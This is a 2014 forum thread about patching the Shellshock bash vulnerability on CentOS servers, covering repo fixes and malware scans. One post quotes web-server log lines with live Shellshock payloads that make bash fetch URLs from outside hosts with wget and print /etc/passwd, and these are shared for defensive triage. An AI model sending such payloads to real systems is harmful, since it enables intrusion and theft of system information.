Get the most out of your Centmin Mod LEMP stack
Become a Member

Security Bash Code Injection Vulnerability CVE-2014-6271 (update bash)

Discussion in 'CentOS, Redhat & Oracle Linux News' started by eva2000, Sep 25, 2014.

  1. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    waiting game :)

     
  2. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    For those using Oracle Linux 6.5

    Code:
    yum list bash -q
    Installed Packages
    bash.x86_64                                           4.1.2-15.el6_5.1.0.1                                            @ol6_latest
    Code:
    rpm -qa --changelog bash | head -n10
    * Thu Sep 25 2014 John Haxby <john.haxby@oracle.com> - 4.1.2-15.1.0.1
    - Preliminary fix for CVE-2014-7169
    
    * Mon Sep 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.1.2-15.1
    - Check for fishy environment [CVE-2014-6271]
      Resolves: #1141645
     
  3. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    For Linode users who still have yet to see updates for the 2nd bash update, it's because Linode uses it's own baseurl mirror for base and updates streams. You can speed this up by editing /etc/yum.repos.d/CentOS-Base.repo

    Then commenting out the baseurl lines for [base] and [updates] respectively

    for [base]
    Code:
    #baseurl=http://mirrors.linode.com/centos/$releasever/os/$basearch/
    for [updates]
    Code:
    #baseurl=http://mirrors.linode.com/centos/$releasever/updates/$basearch/
    contents of /etc/yum.repos.d/CentOS-Base.repo with commented out baseurl lines
    Code:
           
    # CentOS-Base.repo
    #
    # The mirror system uses the connecting IP address of the client and the
    # update status of each mirror to pick mirrors that are updated to and
    # geographically close to the client.  You should use this for CentOS updates
    # unless you are manually picking other mirrors.
    #
    # If the mirrorlist= does not work for you, as a fall back you can try the
    # remarked out baseurl= line instead.
    #
    #
    
    [base]
    name=CentOS-$releasever - Base
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os
    #baseurl=http://mirrors.linode.com/centos/$releasever/os/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    
    #released updates
    [updates]
    name=CentOS-$releasever - Updates
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates
    #baseurl=http://mirrors.linode.com/centos/$releasever/updates/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    priority=1
    
    #additional packages that may be useful
    [extras]
    name=CentOS-$releasever - Extras
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=extras
    baseurl=http://mirrors.linode.com/centos/$releasever/extras/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    
    #additional packages that extend functionality of existing packages
    [centosplus]
    name=CentOS-$releasever - Plus
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=centosplus
    baseurl=http://mirrors.linode.com/centos/$releasever/centosplus/$basearch/
    gpgcheck=1
    enabled=0
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=2
    
    #contrib - packages by Centos Users
    [contrib]
    name=CentOS-$releasever - Contrib
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=contrib
    baseurl=http://mirrors.linode.com/centos/$releasever/contrib/$basearch/
    gpgcheck=1
    enabled=0
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=2
    Then you can see the update, this is on CentOS 6.5 with Linode
    Code:
    yum list bash -q
    Installed Packages
    bash.x86_64                        4.1.2-15.el6_5.1                         @updates
    Available Packages
    bash.x86_64                        4.1.2-15.el6_5.2                         updates
     
    Last edited: Sep 27, 2014
  4. Omer

    Omer New Member

    10
    8
    3
    Sep 11, 2014
    Ratings:
    +8
    Local Time:
    1:58 PM
    Nginx 1.7.5
    MariaDB 5.5
    Thanks for notification.
     
  5. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  6. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Bash shellshock FAQ by Redhat added to first post

    excerpt
     
  7. Guilherme Jaccoud

    Guilherme Jaccoud Member

    63
    30
    18
    May 29, 2014
    Ratings:
    +30
    Local Time:
    8:58 AM
    I can't update :/
    Centos 6.4 x64 DigitalOcean

    [root@server ~]# yum update bash
    Loaded plugins: downloadonly, fastestmirror, priorities
    Determining fastest mirrors
    epel/metalink | 9.7 kB 00:00
    * base: mirror.atlanticmetro.net
    * epel: mirrors.mit.edu
    * extras: mirrors.mit.edu
    * rpmforge: repoforge.mirror.constant.com
    * updates: centos.hostingxtreme.com
    http://centos.alt.ru/repository/centos/6/x86_64/repodata/repomd.xml: [Errno 14] PYCURL ERROR 22 - "The requested URL returned error: 403 Forbidden"
    Trying other mirror.
    Error: Cannot retrieve repository metadata (repomd.xml) for repository: CentALT. Please verify its path and try again
     
  8. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    you must be on older centmin mod which had CentALT enabled, that repo is dead now so edit /etc/yum.repos.d/centalt.repo and set enable=0

    then run

    Code:
    yum clean all
    yum update
    edit: also made a yum-cron thread at Automatic nightly YUM updates with yum-cron :)
     
    Last edited: Sep 28, 2014
  9. Guilherme Jaccoud

    Guilherme Jaccoud Member

    63
    30
    18
    May 29, 2014
    Ratings:
    +30
    Local Time:
    8:58 AM
    Great!
    Yup… two of my servers had CentosAlt enabled.
    Just updates 5 servers, thanks :)
     
  10. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Great to hear :)

    You must be using an older Centmin Mod ? which version ? As latest updated .07 stable has a check for this and auto disables centalt repo if detected as enabled when running centmin.sh - see lines 17-22 of inc/cpcheck.inc
     
  11. Guilherme Jaccoud

    Guilherme Jaccoud Member

    63
    30
    18
    May 29, 2014
    Ratings:
    +30
    Local Time:
    8:58 AM
    [root@venus ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@jupiter ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@mars ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@saturn ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@uranus ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    strangely enough, only MARS (which is my development web server and was rebuild most recently) was not affected by the CentosALT repo.

    Cheers Eva!
     
  12. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  13. Guilherme Jaccoud

    Guilherme Jaccoud Member

    63
    30
    18
    May 29, 2014
    Ratings:
    +30
    Local Time:
    8:58 AM
    Great, I will be updating these servers soon. Will be back at home in some weeks and I want to start playing with .08 beta and also, finish the logo we started months ago!
     
  14. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  15. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Dam, we're not out of the woods completely, more vulnerabilities in bash ! :eek:

    New ones for CVE-2014-6277 (RedHat/CentOS not vulnerable) and CVE-2014-6278 (not yet patched for Redhat/CentOS) (info at Further flaws render Shellshock patch ineffective - Security - News - iTnews.com.au and at lcamtuf's blog: Bash bug: apply Florian's patch now (CVE-2014-6277 and CVE-2014-6278)
     
    Last edited: Sep 30, 2014
  16. deltahf

    deltahf Premium Member Premium Member

    587
    265
    63
    Jun 8, 2014
    Ratings:
    +489
    Local Time:
    6:58 AM
    Thanks for helping stay on top of this issue, George. I have patched my system earlier (I believe the Linode repositories are updated now because I am running 15.el6_5.2 after doing a yum update bash on a VPS with them earlier today).

    Unfortunately, I have been away on a camping trip since all of this broke out and I have been slow to apply this, and searching my Nginx logs shows that some people have been probing my server. A grep search for ":\;" with returns the following results:

    Code:
    83.166.234.133 - - [26/Sep/2014:19:13:23 -0400] "GET / HTTP/1.0" 200 55008 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://gtplanet.net/\x22"
    
    83.166.234.133 - - [26/Sep/2014:19:21:14 -0400] "GET / HTTP/1.0" 200 49990 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://gtplanet.net/\x22"
    
    62.210.75.170 - - [29/Sep/2014:06:58:17 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 22333 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:17 -0400] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 22332 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET /cgi-mod/index.cgi HTTP/1.1" 404 22324 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET / HTTP/1.1" 200 55041 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 22327 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 22333 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 22332 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET / HTTP/1.1" 200 55041 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 22327 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-mod/index.cgi HTTP/1.1" 404 22324 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    I also found two other suspicious requests when searching for "passwd":

    Code:
    85.25.242.250 - - [27/Sep/2014:12:17:43 -0400] "GET / HTTP/1.1" 200 54987 "-" "() { foo;};echo;/bin/cat /etc/passwd"
    
    85.25.242.250 - - [28/Sep/2014:09:28:46 -0400] "GET / HTTP/1.1" 200 55041 "-" "() { foo;};echo;/bin/cat /etc/passwd"
    Should I be concerned about this? I have just installed the maldet Centminmod plugin as you linked in the other thread and I'm running a scan on the entire system now. Is there anything else you would recommend to check if a system has been compromised?
     
  17. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  18. deltahf

    deltahf Premium Member Premium Member

    587
    265
    63
    Jun 8, 2014
    Ratings:
    +489
    Local Time:
    6:58 AM
    OK, thanks; I just completed a scan of my entire system (for all files changed within the past 7 days):
    Code:
    maldet -r / 7
    
    And it returned no malware hits. :) I will keep doing more scans over the next few days as the malware definitions are updated. I have been researching my log entries to see if I could figure out what the attackers were trying to do, and I found this page which offers a pretty good overview of various attacks which have been seen in the wild.

    I believe my attackers were trying to log fake ad clicks with "dipad.biz". I am not sure what the "creditstat.ru" URL does, as it appears to direct the page contents to /dev/null. Should I be concerned about the /etc/passwd requests?
     
  19. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    you can do a full scan with

    Code:
    maldet -a /
     
  20. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    More info on latest CVE-2014-6278 at Shellshock fixes beget another round of patches as attacks mount | Ars Technica